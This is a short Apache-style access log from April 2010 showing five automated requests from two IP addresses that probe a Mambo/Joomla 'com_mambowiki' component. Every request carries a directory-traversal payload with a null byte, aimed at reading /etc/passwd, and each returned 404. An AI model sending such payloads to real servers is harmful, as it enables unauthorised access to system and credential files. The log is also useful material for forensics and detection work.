91.121.167.15 - - [22/Apr/2010:20:55:53 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
91.121.167.15 - - [22/Apr/2010:20:55:53 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [22/Apr/2010:20:56:04 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.216.234.1 - - [22/Apr/2010:20:56:05 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [22/Apr/2010:20:56:05 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
